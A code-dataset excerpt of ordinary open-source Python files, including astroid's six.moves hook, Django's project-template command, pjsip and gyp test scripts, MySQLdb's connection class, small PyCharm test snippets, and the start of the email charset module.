| code | repo_name | path | language | license | size |
|---|---|---|---|---|---|
| stringlengths 2–1.05M | stringlengths 5–104 | stringlengths 4–251 | stringclasses 1 value | stringclasses 15 values | int32 2–1.05M |
# copyright 2003-2014 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:[email protected]
#
# This file is part of astroid.
#
# astroid is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 2.1 of the License, or (at your option) any
# later version.
#
# astroid is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with astroid. If not, see <http://www.gnu.org/licenses/>.
"""Astroid hooks for six.moves."""
import sys
from textwrap import dedent
from astroid import MANAGER, register_module_extender
from astroid.builder import AstroidBuilder
def six_moves_transform_py2():
return AstroidBuilder(MANAGER).string_build(dedent('''
import urllib as _urllib
import urllib2 as _urllib2
import urlparse as _urlparse
class Moves(object):
import BaseHTTPServer
import CGIHTTPServer
import SimpleHTTPServer
from StringIO import StringIO
from cStringIO import StringIO as cStringIO
from UserDict import UserDict
from UserList import UserList
from UserString import UserString
import __builtin__ as builtins
import thread as _thread
import dummy_thread as _dummy_thread
import ConfigParser as configparser
import copy_reg as copyreg
from itertools import (imap as map,
ifilter as filter,
ifilterfalse as filterfalse,
izip_longest as zip_longest,
izip as zip)
import htmlentitydefs as html_entities
import HTMLParser as html_parser
import httplib as http_client
import cookielib as http_cookiejar
import Cookie as http_cookies
import Queue as queue
import repr as reprlib
from pipes import quote as shlex_quote
import SocketServer as socketserver
import SimpleXMLRPCServer as xmlrpc_server
import xmlrpclib as xmlrpc_client
import _winreg as winreg
import robotparser as urllib_robotparser
input = raw_input
intern = intern
range = xrange
xrange = xrange
reduce = reduce
reload_module = reload
class UrllibParse(object):
ParseResult = _urlparse.ParseResult
SplitResult = _urlparse.SplitResult
parse_qs = _urlparse.parse_qs
parse_qsl = _urlparse.parse_qsl
urldefrag = _urlparse.urldefrag
urljoin = _urlparse.urljoin
urlparse = _urlparse.urlparse
urlsplit = _urlparse.urlsplit
urlunparse = _urlparse.urlunparse
urlunsplit = _urlparse.urlunsplit
quote = _urllib.quote
quote_plus = _urllib.quote_plus
unquote = _urllib.unquote
unquote_plus = _urllib.unquote_plus
urlencode = _urllib.urlencode
splitquery = _urllib.splitquery
splittag = _urllib.splittag
splituser = _urllib.splituser
uses_fragment = _urlparse.uses_fragment
uses_netloc = _urlparse.uses_netloc
uses_params = _urlparse.uses_params
uses_query = _urlparse.uses_query
uses_relative = _urlparse.uses_relative
class UrllibError(object):
URLError = _urllib2.URLError
HTTPError = _urllib2.HTTPError
ContentTooShortError = _urllib.ContentTooShortError
class DummyModule(object):
pass
class UrllibRequest(object):
urlopen = _urllib2.urlopen
install_opener = _urllib2.install_opener
build_opener = _urllib2.build_opener
pathname2url = _urllib.pathname2url
url2pathname = _urllib.url2pathname
getproxies = _urllib.getproxies
Request = _urllib2.Request
OpenerDirector = _urllib2.OpenerDirector
HTTPDefaultErrorHandler = _urllib2.HTTPDefaultErrorHandler
HTTPRedirectHandler = _urllib2.HTTPRedirectHandler
HTTPCookieProcessor = _urllib2.HTTPCookieProcessor
ProxyHandler = _urllib2.ProxyHandler
BaseHandler = _urllib2.BaseHandler
HTTPPasswordMgr = _urllib2.HTTPPasswordMgr
HTTPPasswordMgrWithDefaultRealm = _urllib2.HTTPPasswordMgrWithDefaultRealm
AbstractBasicAuthHandler = _urllib2.AbstractBasicAuthHandler
HTTPBasicAuthHandler = _urllib2.HTTPBasicAuthHandler
ProxyBasicAuthHandler = _urllib2.ProxyBasicAuthHandler
AbstractDigestAuthHandler = _urllib2.AbstractDigestAuthHandler
HTTPDigestAuthHandler = _urllib2.HTTPDigestAuthHandler
ProxyDigestAuthHandler = _urllib2.ProxyDigestAuthHandler
HTTPHandler = _urllib2.HTTPHandler
HTTPSHandler = _urllib2.HTTPSHandler
FileHandler = _urllib2.FileHandler
FTPHandler = _urllib2.FTPHandler
CacheFTPHandler = _urllib2.CacheFTPHandler
UnknownHandler = _urllib2.UnknownHandler
HTTPErrorProcessor = _urllib2.HTTPErrorProcessor
urlretrieve = _urllib.urlretrieve
urlcleanup = _urllib.urlcleanup
proxy_bypass = _urllib.proxy_bypass
urllib_parse = UrllibParse()
urllib_error = UrllibError()
urllib = DummyModule()
urllib.request = UrllibRequest()
urllib.parse = UrllibParse()
urllib.error = UrllibError()
moves = Moves()
'''))
def six_moves_transform_py3():
return AstroidBuilder(MANAGER).string_build(dedent('''
class Moves(object):
import _io
cStringIO = _io.StringIO
filter = filter
from itertools import filterfalse
input = input
from sys import intern
map = map
range = range
from imp import reload as reload_module
from functools import reduce
from shlex import quote as shlex_quote
from io import StringIO
from collections import UserDict, UserList, UserString
xrange = range
zip = zip
from itertools import zip_longest
import builtins
import configparser
import copyreg
import _dummy_thread
import http.cookiejar as http_cookiejar
import http.cookies as http_cookies
import html.entities as html_entities
import html.parser as html_parser
import http.client as http_client
import http.server
BaseHTTPServer = CGIHTTPServer = SimpleHTTPServer = http.server
import pickle as cPickle
import queue
import reprlib
import socketserver
import _thread
import winreg
import xmlrpc.server as xmlrpc_server
import xmlrpc.client as xmlrpc_client
import urllib.robotparser as urllib_robotparser
import email.mime.multipart as email_mime_multipart
import email.mime.nonmultipart as email_mime_nonmultipart
import email.mime.text as email_mime_text
import email.mime.base as email_mime_base
import urllib.parse as urllib_parse
import urllib.error as urllib_error
import tkinter
import tkinter.dialog as tkinter_dialog
import tkinter.filedialog as tkinter_filedialog
import tkinter.scrolledtext as tkinter_scrolledtext
        import tkinter.simpledialog as tkinter_simpledialog
import tkinter.tix as tkinter_tix
import tkinter.ttk as tkinter_ttk
import tkinter.constants as tkinter_constants
import tkinter.dnd as tkinter_dnd
import tkinter.colorchooser as tkinter_colorchooser
import tkinter.commondialog as tkinter_commondialog
import tkinter.filedialog as tkinter_tkfiledialog
import tkinter.font as tkinter_font
import tkinter.messagebox as tkinter_messagebox
import urllib.request
import urllib.robotparser as urllib_robotparser
import urllib.parse as urllib_parse
import urllib.error as urllib_error
moves = Moves()
'''))
if sys.version_info[0] == 2:
TRANSFORM = six_moves_transform_py2
else:
TRANSFORM = six_moves_transform_py3
register_module_extender(MANAGER, 'six', TRANSFORM)
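# Illustrative sketch (editor addition, not part of the upstream module): a hedged
# example of inspecting the synthetic module produced by the transform above. It
# assumes an astroid version where string_build() returns a Module exposing getattr();
# treat it as a sketch rather than canonical astroid usage.
def _demo_six_moves_transform():
    fake_six = TRANSFORM()                 # synthetic module for the running Python version
    return fake_six.getattr('moves')[0]    # the injected 'moves = Moves()' assignment node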
| Shouqun/node-gn | tools/depot_tools/third_party/logilab/astroid/brain/pysix_moves.py | Python | mit | 8,703 |
import cgi
import errno
import io
import mimetypes
import os
import posixpath
import re
import shutil
import stat
import sys
import tempfile
from os import path
import django
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from django.core.management.utils import handle_extensions
from django.template import Context, Engine
from django.utils import archive, six
from django.utils.six.moves.urllib.request import urlretrieve
from django.utils.version import get_docs_version
_drive_re = re.compile('^([a-z]):', re.I)
_url_drive_re = re.compile('^([a-z])[:|]', re.I)
class TemplateCommand(BaseCommand):
"""
Copies either a Django application layout template or a Django project
layout template into the specified directory.
:param style: A color style object (see django.core.management.color).
:param app_or_project: The string 'app' or 'project'.
:param name: The name of the application or project.
:param directory: The directory to which the template should be copied.
:param options: The additional variables passed to project or app templates
"""
requires_system_checks = False
# The supported URL schemes
url_schemes = ['http', 'https', 'ftp']
# Can't perform any active locale changes during this command, because
    # settings might not be available at all.
leave_locale_alone = True
# Rewrite the following suffixes when determining the target filename.
rewrite_template_suffixes = (
# Allow shipping invalid .py files without byte-compilation.
('.py-tpl', '.py'),
)
def add_arguments(self, parser):
parser.add_argument('name', help='Name of the application or project.')
parser.add_argument('directory', nargs='?', help='Optional destination directory')
parser.add_argument('--template', help='The path or URL to load the template from.')
parser.add_argument(
'--extension', '-e', dest='extensions',
action='append', default=['py'],
help='The file extension(s) to render (default: "py"). '
'Separate multiple extensions with commas, or use '
'-e multiple times.'
)
parser.add_argument(
'--name', '-n', dest='files',
action='append', default=[],
help='The file name(s) to render. Separate multiple extensions '
'with commas, or use -n multiple times.'
)
def handle(self, app_or_project, name, target=None, **options):
self.app_or_project = app_or_project
self.paths_to_remove = []
self.verbosity = options['verbosity']
self.validate_name(name, app_or_project)
# if some directory is given, make sure it's nicely expanded
if target is None:
top_dir = path.join(os.getcwd(), name)
try:
os.makedirs(top_dir)
except OSError as e:
if e.errno == errno.EEXIST:
message = "'%s' already exists" % top_dir
else:
message = e
raise CommandError(message)
else:
top_dir = os.path.abspath(path.expanduser(target))
if not os.path.exists(top_dir):
raise CommandError("Destination directory '%s' does not "
"exist, please create it first." % top_dir)
extensions = tuple(handle_extensions(options['extensions']))
extra_files = []
for file in options['files']:
extra_files.extend(map(lambda x: x.strip(), file.split(',')))
if self.verbosity >= 2:
self.stdout.write("Rendering %s template files with "
"extensions: %s\n" %
(app_or_project, ', '.join(extensions)))
self.stdout.write("Rendering %s template files with "
"filenames: %s\n" %
(app_or_project, ', '.join(extra_files)))
base_name = '%s_name' % app_or_project
base_subdir = '%s_template' % app_or_project
base_directory = '%s_directory' % app_or_project
camel_case_name = 'camel_case_%s_name' % app_or_project
camel_case_value = ''.join(x for x in name.title() if x != '_')
context = Context(dict(options, **{
base_name: name,
base_directory: top_dir,
camel_case_name: camel_case_value,
'docs_version': get_docs_version(),
'django_version': django.__version__,
'unicode_literals': '' if six.PY3 else '# -*- coding: utf-8 -*-\n'
'from __future__ import unicode_literals\n\n',
}), autoescape=False)
# Setup a stub settings environment for template rendering
if not settings.configured:
settings.configure()
django.setup()
template_dir = self.handle_template(options['template'],
base_subdir)
prefix_length = len(template_dir) + 1
for root, dirs, files in os.walk(template_dir):
path_rest = root[prefix_length:]
relative_dir = path_rest.replace(base_name, name)
if relative_dir:
target_dir = path.join(top_dir, relative_dir)
if not path.exists(target_dir):
os.mkdir(target_dir)
for dirname in dirs[:]:
if dirname.startswith('.') or dirname == '__pycache__':
dirs.remove(dirname)
for filename in files:
if filename.endswith(('.pyo', '.pyc', '.py.class')):
# Ignore some files as they cause various breakages.
continue
old_path = path.join(root, filename)
new_path = path.join(top_dir, relative_dir,
filename.replace(base_name, name))
for old_suffix, new_suffix in self.rewrite_template_suffixes:
if new_path.endswith(old_suffix):
new_path = new_path[:-len(old_suffix)] + new_suffix
break # Only rewrite once
if path.exists(new_path):
raise CommandError("%s already exists, overlaying a "
"project or app into an existing "
"directory won't replace conflicting "
"files" % new_path)
# Only render the Python files, as we don't want to
# accidentally render Django templates files
if new_path.endswith(extensions) or filename in extra_files:
with io.open(old_path, 'r', encoding='utf-8') as template_file:
content = template_file.read()
template = Engine().from_string(content)
content = template.render(context)
with io.open(new_path, 'w', encoding='utf-8') as new_file:
new_file.write(content)
else:
shutil.copyfile(old_path, new_path)
if self.verbosity >= 2:
self.stdout.write("Creating %s\n" % new_path)
try:
shutil.copymode(old_path, new_path)
self.make_writeable(new_path)
except OSError:
self.stderr.write(
"Notice: Couldn't set permission bits on %s. You're "
"probably using an uncommon filesystem setup. No "
"problem." % new_path, self.style.NOTICE)
if self.paths_to_remove:
if self.verbosity >= 2:
self.stdout.write("Cleaning up temporary files.\n")
for path_to_remove in self.paths_to_remove:
if path.isfile(path_to_remove):
os.remove(path_to_remove)
else:
shutil.rmtree(path_to_remove)
def handle_template(self, template, subdir):
"""
Determines where the app or project templates are.
Use django.__path__[0] as the default because we don't
know into which directory Django has been installed.
"""
if template is None:
return path.join(django.__path__[0], 'conf', subdir)
else:
if template.startswith('file://'):
template = template[7:]
expanded_template = path.expanduser(template)
expanded_template = path.normpath(expanded_template)
if path.isdir(expanded_template):
return expanded_template
if self.is_url(template):
# downloads the file and returns the path
absolute_path = self.download(template)
else:
absolute_path = path.abspath(expanded_template)
if path.exists(absolute_path):
return self.extract(absolute_path)
raise CommandError("couldn't handle %s template %s." %
(self.app_or_project, template))
def validate_name(self, name, app_or_project):
if name is None:
raise CommandError("you must provide %s %s name" % (
"an" if app_or_project == "app" else "a", app_or_project))
# If it's not a valid directory name.
if six.PY2:
if not re.search(r'^[_a-zA-Z]\w*$', name):
# Provide a smart error message, depending on the error.
if not re.search(r'^[_a-zA-Z]', name):
message = 'make sure the name begins with a letter or underscore'
else:
message = 'use only numbers, letters and underscores'
raise CommandError("%r is not a valid %s name. Please %s." %
(name, app_or_project, message))
else:
if not name.isidentifier():
raise CommandError(
"%r is not a valid %s name. Please make sure the name is "
"a valid identifier." % (name, app_or_project)
)
def download(self, url):
"""
Downloads the given URL and returns the file name.
"""
def cleanup_url(url):
tmp = url.rstrip('/')
filename = tmp.split('/')[-1]
if url.endswith('/'):
display_url = tmp + '/'
else:
display_url = url
return filename, display_url
prefix = 'django_%s_template_' % self.app_or_project
tempdir = tempfile.mkdtemp(prefix=prefix, suffix='_download')
self.paths_to_remove.append(tempdir)
filename, display_url = cleanup_url(url)
if self.verbosity >= 2:
self.stdout.write("Downloading %s\n" % display_url)
try:
the_path, info = urlretrieve(url, path.join(tempdir, filename))
except IOError as e:
raise CommandError("couldn't download URL %s to %s: %s" %
(url, filename, e))
used_name = the_path.split('/')[-1]
# Trying to get better name from response headers
content_disposition = info.get('content-disposition')
if content_disposition:
_, params = cgi.parse_header(content_disposition)
guessed_filename = params.get('filename') or used_name
else:
guessed_filename = used_name
# Falling back to content type guessing
ext = self.splitext(guessed_filename)[1]
content_type = info.get('content-type')
if not ext and content_type:
ext = mimetypes.guess_extension(content_type)
if ext:
guessed_filename += ext
# Move the temporary file to a filename that has better
# chances of being recognized by the archive utils
if used_name != guessed_filename:
guessed_path = path.join(tempdir, guessed_filename)
shutil.move(the_path, guessed_path)
return guessed_path
# Giving up
return the_path
def splitext(self, the_path):
"""
Like os.path.splitext, but takes off .tar, too
"""
base, ext = posixpath.splitext(the_path)
if base.lower().endswith('.tar'):
ext = base[-4:] + ext
base = base[:-4]
return base, ext
def extract(self, filename):
"""
        Extracts the given file to a temporary directory and returns
the path of the directory with the extracted content.
"""
prefix = 'django_%s_template_' % self.app_or_project
tempdir = tempfile.mkdtemp(prefix=prefix, suffix='_extract')
self.paths_to_remove.append(tempdir)
if self.verbosity >= 2:
self.stdout.write("Extracting %s\n" % filename)
try:
archive.extract(filename, tempdir)
return tempdir
except (archive.ArchiveException, IOError) as e:
raise CommandError("couldn't extract file %s to %s: %s" %
(filename, tempdir, e))
def is_url(self, template):
"""
Returns True if the name looks like a URL
"""
if ':' not in template:
return False
scheme = template.split(':', 1)[0].lower()
return scheme in self.url_schemes
def make_writeable(self, filename):
"""
Make sure that the file is writeable.
Useful if our source is read-only.
"""
if sys.platform.startswith('java'):
# On Jython there is no os.access()
return
if not os.access(filename, os.W_OK):
st = os.stat(filename)
new_permissions = stat.S_IMODE(st.st_mode) | stat.S_IWUSR
os.chmod(filename, new_permissions)
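# Illustrative sketch (editor addition): a tiny, self-contained rehearsal of the
# '.py-tpl' -> '.py' suffix rewriting performed in handle() above. The file name used
# here is a hypothetical example; nothing below runs when Django imports this module.
if __name__ == '__main__':
    name = 'settings.py-tpl'
    for old_suffix, new_suffix in TemplateCommand.rewrite_template_suffixes:
        if name.endswith(old_suffix):
            name = name[:-len(old_suffix)] + new_suffix
            break  # only rewrite once, as in handle()
    assert name == 'settings.py'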
| mbayon/TFG-MachineLearning | venv/lib/python3.6/site-packages/django/core/management/templates.py | Python | mit | 14,053 |
# $Id: 331_srtp_prefer_rtp_avp.py 2081 2008-06-27 21:59:15Z bennylp $
import inc_sip as sip
import inc_sdp as sdp
# When SRTP is NOT enabled in pjsua, it should prefer to use
# RTP/AVP media line if there are multiple m=audio lines
sdp = \
"""
v=0
o=- 0 0 IN IP4 127.0.0.1
s=-
c=IN IP4 127.0.0.1
t=0 0
m=audio 5000 RTP/SAVP 0
a=crypto:1 aes_cm_128_hmac_sha1_80 inline:WnD7c1ksDGs+dIefCEo8omPg4uO8DYIinNGL5yxQ
m=audio 4000 RTP/AVP 0
"""
pjsua_args = "--null-audio --auto-answer 200 --use-srtp 0"
extra_headers = ""
include = ["Content-Type: application/sdp", # response must include SDP
"m=audio 0 RTP/SAVP[\\s\\S]+m=audio [1-9]+[0-9]* RTP/AVP"
]
exclude = ["a=crypto"]
sendto_cfg = sip.SendtoCfg("Prefer RTP/SAVP", pjsua_args, sdp, 200,
extra_headers=extra_headers,
resp_inc=include, resp_exc=exclude)
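# Illustrative sketch (editor addition): how the include/exclude patterns above are
# intended to be read. The SDP answer below is hypothetical and the real matching is
# performed by the sendto test driver, so treat this purely as documentation.
if __name__ == '__main__':
    import re
    hypothetical_answer = ("Content-Type: application/sdp\r\n\r\n"
                           "v=0\r\n"
                           "m=audio 0 RTP/SAVP 0\r\n"
                           "m=audio 4000 RTP/AVP 0\r\n")
    assert all(re.search(p, hypothetical_answer) for p in include)
    assert not any(re.search(p, hypothetical_answer) for p in exclude)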
| lxki/pjsip | tests/pjsua/scripts-sendto/331_srtp_prefer_rtp_avp.py | Python | gpl-2.0 | 827 |
#!/usr/bin/env python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies simple rules when using an explicit build target of 'all'.
"""
import TestGyp
import os
import sys
test = TestGyp.TestGyp(formats=['make', 'ninja', 'android', 'xcode', 'msvs'])
test.run_gyp('actions.gyp', chdir='src')
test.relocate('src', 'relocate/src')
test.build('actions.gyp', chdir='relocate/src')
expect = """\
no dir here
hi c
hello baz
"""
if test.format == 'xcode':
chdir = 'relocate/src/subdir'
else:
chdir = 'relocate/src'
test.run_built_executable('gencc_int_output', chdir=chdir, stdout=expect)
if test.format == 'msvs':
test.run_built_executable('gencc_int_output_external', chdir=chdir,
stdout=expect)
test.must_match('relocate/src/subdir/foo/bar/baz.dirname',
os.path.join('foo', 'bar'))
test.must_match('relocate/src/subdir/a/b/c.dirname',
os.path.join('a', 'b'))
# FIXME the xcode and make generators incorrectly convert RULE_INPUT_PATH
# to an absolute path, making the tests below fail!
if test.format != 'xcode' and test.format != 'make':
test.must_match('relocate/src/subdir/foo/bar/baz.path',
os.path.join('foo', 'bar', 'baz.printvars'))
test.must_match('relocate/src/subdir/a/b/c.path',
os.path.join('a', 'b', 'c.printvars'))
test.pass_test()
| sgraham/nope | tools/gyp/test/rules-dirname/gyptest-dirname.py | Python | bsd-3-clause | 1,475 |
"""
This module implements connections for MySQLdb. Presently there is
only one class: Connection. Others are unlikely. However, you might
want to make your own subclasses. In most cases, you will probably
override Connection.default_cursor with a non-standard Cursor class.
"""
from MySQLdb import cursors
from _mysql_exceptions import Warning, Error, InterfaceError, DataError, \
DatabaseError, OperationalError, IntegrityError, InternalError, \
NotSupportedError, ProgrammingError
import types, _mysql
import re
def defaulterrorhandler(connection, cursor, errorclass, errorvalue):
"""
If cursor is not None, (errorclass, errorvalue) is appended to
cursor.messages; otherwise it is appended to
connection.messages. Then errorclass is raised with errorvalue as
the value.
You can override this with your own error handler by assigning it
to the instance.
"""
error = errorclass, errorvalue
if cursor:
cursor.messages.append(error)
else:
connection.messages.append(error)
del cursor
del connection
raise errorclass, errorvalue
re_numeric_part = re.compile(r"^(\d+)")
def numeric_part(s):
"""Returns the leading numeric part of a string.
>>> numeric_part("20-alpha")
20
>>> numeric_part("foo")
>>> numeric_part("16b")
16
"""
m = re_numeric_part.match(s)
if m:
return int(m.group(1))
return None
class Connection(_mysql.connection):
"""MySQL Database Connection Object"""
default_cursor = cursors.Cursor
def __init__(self, *args, **kwargs):
"""
Create a connection to the database. It is strongly recommended
that you only use keyword parameters. Consult the MySQL C API
documentation for more information.
host
string, host to connect
user
string, user to connect as
passwd
string, password to use
db
string, database to use
port
integer, TCP/IP port to connect to
unix_socket
string, location of unix_socket to use
conv
conversion dictionary, see MySQLdb.converters
connect_timeout
number of seconds to wait before the connection attempt
fails.
compress
if set, compression is enabled
named_pipe
if set, a named pipe is used to connect (Windows only)
init_command
command which is run once the connection is created
read_default_file
file from which default client values are read
read_default_group
configuration group to use from the default file
cursorclass
class object, used to create cursors (keyword only)
use_unicode
If True, text-like columns are returned as unicode objects
using the connection's character set. Otherwise, text-like
          columns are returned as normal strings. Unicode objects
          will always be encoded to
the connection's character set regardless of this setting.
charset
If supplied, the connection character set will be changed
to this character set (MySQL-4.1 and newer). This implies
use_unicode=True.
sql_mode
If supplied, the session SQL mode will be changed to this
setting (MySQL-4.1 and newer). For more details and legal
values, see the MySQL documentation.
client_flag
integer, flags to use or 0
(see MySQL docs or constants/CLIENTS.py)
ssl
dictionary or mapping, contains SSL connection parameters;
see the MySQL documentation for more details
(mysql_ssl_set()). If this is set, and the client does not
support SSL, NotSupportedError will be raised.
local_infile
integer, non-zero enables LOAD LOCAL INFILE; zero disables
autocommit
If False (default), autocommit is disabled.
If True, autocommit is enabled.
If None, autocommit isn't set and server default is used.
There are a number of undocumented, non-standard methods. See the
documentation for the MySQL C API for some hints on what they do.
"""
from MySQLdb.constants import CLIENT, FIELD_TYPE
from MySQLdb.converters import conversions
from weakref import proxy
kwargs2 = kwargs.copy()
if 'conv' in kwargs:
conv = kwargs['conv']
else:
conv = conversions
conv2 = {}
for k, v in conv.items():
if isinstance(k, int) and isinstance(v, list):
conv2[k] = v[:]
else:
conv2[k] = v
kwargs2['conv'] = conv2
cursorclass = kwargs2.pop('cursorclass', self.default_cursor)
charset = kwargs2.pop('charset', '')
if charset:
use_unicode = True
else:
use_unicode = False
use_unicode = kwargs2.pop('use_unicode', use_unicode)
sql_mode = kwargs2.pop('sql_mode', '')
client_flag = kwargs.get('client_flag', 0)
client_version = tuple([ numeric_part(n) for n in _mysql.get_client_info().split('.')[:2] ])
if client_version >= (4, 1):
client_flag |= CLIENT.MULTI_STATEMENTS
if client_version >= (5, 0):
client_flag |= CLIENT.MULTI_RESULTS
kwargs2['client_flag'] = client_flag
# PEP-249 requires autocommit to be initially off
autocommit = kwargs2.pop('autocommit', False)
super(Connection, self).__init__(*args, **kwargs2)
self.cursorclass = cursorclass
self.encoders = dict([ (k, v) for k, v in conv.items()
if type(k) is not int ])
self._server_version = tuple([ numeric_part(n) for n in self.get_server_info().split('.')[:2] ])
db = proxy(self)
def _get_string_literal():
def string_literal(obj, dummy=None):
return db.string_literal(obj)
return string_literal
def _get_unicode_literal():
def unicode_literal(u, dummy=None):
return db.literal(u.encode(unicode_literal.charset))
return unicode_literal
def _get_string_decoder():
def string_decoder(s):
return s.decode(string_decoder.charset)
return string_decoder
string_literal = _get_string_literal()
self.unicode_literal = unicode_literal = _get_unicode_literal()
self.string_decoder = string_decoder = _get_string_decoder()
if not charset:
charset = self.character_set_name()
self.set_character_set(charset)
if sql_mode:
self.set_sql_mode(sql_mode)
if use_unicode:
self.converter[FIELD_TYPE.STRING].append((None, string_decoder))
self.converter[FIELD_TYPE.VAR_STRING].append((None, string_decoder))
self.converter[FIELD_TYPE.VARCHAR].append((None, string_decoder))
self.converter[FIELD_TYPE.BLOB].append((None, string_decoder))
self.encoders[types.StringType] = string_literal
self.encoders[types.UnicodeType] = unicode_literal
self._transactional = self.server_capabilities & CLIENT.TRANSACTIONS
if self._transactional:
if autocommit is not None:
self.autocommit(autocommit)
self.messages = []
def autocommit(self, on):
on = bool(on)
if self.get_autocommit() != on:
_mysql.connection.autocommit(self, on)
def cursor(self, cursorclass=None):
"""
Create a cursor on which queries may be performed. The
optional cursorclass parameter is used to create the
Cursor. By default, self.cursorclass=cursors.Cursor is
used.
"""
return (cursorclass or self.cursorclass)(self)
def __enter__(self):
if self.get_autocommit():
self.query("BEGIN")
return self.cursor()
def __exit__(self, exc, value, tb):
if exc:
self.rollback()
else:
self.commit()
def literal(self, o):
"""
If o is a single object, returns an SQL literal as a string.
If o is a non-string sequence, the items of the sequence are
converted and returned as a sequence.
Non-standard. For internal use; do not use this in your
applications.
"""
return self.escape(o, self.encoders)
def begin(self):
"""Explicitly begin a connection. Non-standard.
DEPRECATED: Will be removed in 1.3.
Use an SQL BEGIN statement instead."""
from warnings import warn
warn("begin() is non-standard and will be removed in 1.3",
DeprecationWarning, 2)
self.query("BEGIN")
if not hasattr(_mysql.connection, 'warning_count'):
def warning_count(self):
"""Return the number of warnings generated from the
last query. This is derived from the info() method."""
from string import atoi
info = self.info()
if info:
return atoi(info.split()[-1])
else:
return 0
def set_character_set(self, charset):
"""Set the connection character set to charset. The character
set can only be changed in MySQL-4.1 and newer. If you try
to change the character set from the current value in an
older version, NotSupportedError will be raised."""
if charset == "utf8mb4":
py_charset = "utf8"
else:
py_charset = charset
if self.character_set_name() != charset:
try:
super(Connection, self).set_character_set(charset)
except AttributeError:
if self._server_version < (4, 1):
raise NotSupportedError("server is too old to set charset")
self.query('SET NAMES %s' % charset)
self.store_result()
self.string_decoder.charset = py_charset
self.unicode_literal.charset = py_charset
def set_sql_mode(self, sql_mode):
"""Set the connection sql_mode. See MySQL documentation for
legal values."""
if self._server_version < (4, 1):
raise NotSupportedError("server is too old to set sql_mode")
self.query("SET SESSION sql_mode='%s'" % sql_mode)
self.store_result()
def show_warnings(self):
"""Return detailed information about warnings as a
sequence of tuples of (Level, Code, Message). This
is only supported in MySQL-4.1 and up. If your server
is an earlier version, an empty sequence is returned."""
if self._server_version < (4,1): return ()
self.query("SHOW WARNINGS")
r = self.store_result()
warnings = r.fetch_row(0)
return warnings
Warning = Warning
Error = Error
InterfaceError = InterfaceError
DatabaseError = DatabaseError
DataError = DataError
OperationalError = OperationalError
IntegrityError = IntegrityError
InternalError = InternalError
ProgrammingError = ProgrammingError
NotSupportedError = NotSupportedError
errorhandler = defaulterrorhandler
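# Illustrative sketch (editor addition): a minimal, hedged example of opening a
# connection with the keyword parameters documented in Connection.__init__ above.
# The host, credentials and database name are hypothetical placeholders.
if __name__ == '__main__':
    conn = Connection(host='localhost', user='example_user',
                      passwd='example_password', db='example_db',
                      charset='utf8', use_unicode=True)
    cur = conn.cursor()
    cur.execute("SELECT VERSION()")
    print cur.fetchone()
    conn.close()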
| skycucumber/Messaging-Gateway | webapp/venv/lib/python2.7/site-packages/MySQLdb/connections.py | Python | gpl-2.0 | 11,777 |
class A:
def __init__(self, a:int, b:float, *args:tuple, c:complex, **kwargs:dict) -> None:
pass
class B(A):
def <warning descr="Call to __init__ of super class is missed">__i<caret>nit__</warning>(self, d:str, *, e:bytes) -> list:
pass | idea4bsd/idea4bsd | python/testData/inspections/AddCallSuperTypeAnnotationsPreserved.py | Python | apache-2.0 | 261 |
# Generated from 'Aliases.h'
def FOUR_CHAR_CODE(x): return x
true = True
false = False
rAliasType = FOUR_CHAR_CODE('alis')
kARMMountVol = 0x00000001
kARMNoUI = 0x00000002
kARMMultVols = 0x00000008
kARMSearch = 0x00000100
kARMSearchMore = 0x00000200
kARMSearchRelFirst = 0x00000400
asiZoneName = -3
asiServerName = -2
asiVolumeName = -1
asiAliasName = 0
asiParentName = 1
kResolveAliasFileNoUI = 0x00000001
| xbmc/atv2 | xbmc/lib/libPython/Python/Lib/plat-mac/Carbon/Aliases.py | Python | gpl-2.0 | 407 |
class C(object):
def f(self, name):
return name
__getattr__ = f
c = C()
print(c.foo) #pass | asedunov/intellij-community | python/testData/inspections/PyUnresolvedReferencesInspection/getattrAttribute.py | Python | apache-2.0 | 108 |
a = [1 2 3] | smmribeiro/intellij-community | python/testData/psi/MissingListSeparators.py | Python | apache-2.0 | 11 |
class A:
def <weak_warning descr="Function name should be lowercase">fooBar</weak_warning>(self): pass
class B(A):
def fooBar(self): pass | kdwink/intellij-community | python/testData/inspections/PyPep8NamingInspection/overridden.py | Python | apache-2.0 | 142 |
def x():
print "bar"
print "foo"
print "xyzzy" | asedunov/intellij-community | python/testData/copyPaste/SingleLine.after.py | Python | apache-2.0 | 58 |
# Copyright (C) 2001-2006 Python Software Foundation
# Author: Ben Gertzfield, Barry Warsaw
# Contact: [email protected]
__all__ = [
'Charset',
'add_alias',
'add_charset',
'add_codec',
]
import email.base64mime
import email.quoprimime
from email import errors
from email.encoders import encode_7or8bit
# Flags for types of header encodings
QP = 1 # Quoted-Printable
BASE64 = 2 # Base64
SHORTEST = 3 # the shorter of QP and base64, but only for headers
# In "=?charset?q?hello_world?=", the =?, ?q?, and ?= add up to 7
MISC_LEN = 7
DEFAULT_CHARSET = 'us-ascii'
# Defaults
CHARSETS = {
# input header enc body enc output conv
'iso-8859-1': (QP, QP, None),
'iso-8859-2': (QP, QP, None),
'iso-8859-3': (QP, QP, None),
'iso-8859-4': (QP, QP, None),
# iso-8859-5 is Cyrillic, and not especially used
# iso-8859-6 is Arabic, also not particularly used
# iso-8859-7 is Greek, QP will not make it readable
# iso-8859-8 is Hebrew, QP will not make it readable
'iso-8859-9': (QP, QP, None),
'iso-8859-10': (QP, QP, None),
# iso-8859-11 is Thai, QP will not make it readable
'iso-8859-13': (QP, QP, None),
'iso-8859-14': (QP, QP, None),
'iso-8859-15': (QP, QP, None),
'windows-1252':(QP, QP, None),
'viscii': (QP, QP, None),
'us-ascii': (None, None, None),
'big5': (BASE64, BASE64, None),
'gb2312': (BASE64, BASE64, None),
'euc-jp': (BASE64, None, 'iso-2022-jp'),
'shift_jis': (BASE64, None, 'iso-2022-jp'),
'iso-2022-jp': (BASE64, None, None),
'koi8-r': (BASE64, BASE64, None),
'utf-8': (SHORTEST, BASE64, 'utf-8'),
# We're making this one up to represent raw unencoded 8-bit
'8bit': (None, BASE64, 'utf-8'),
}
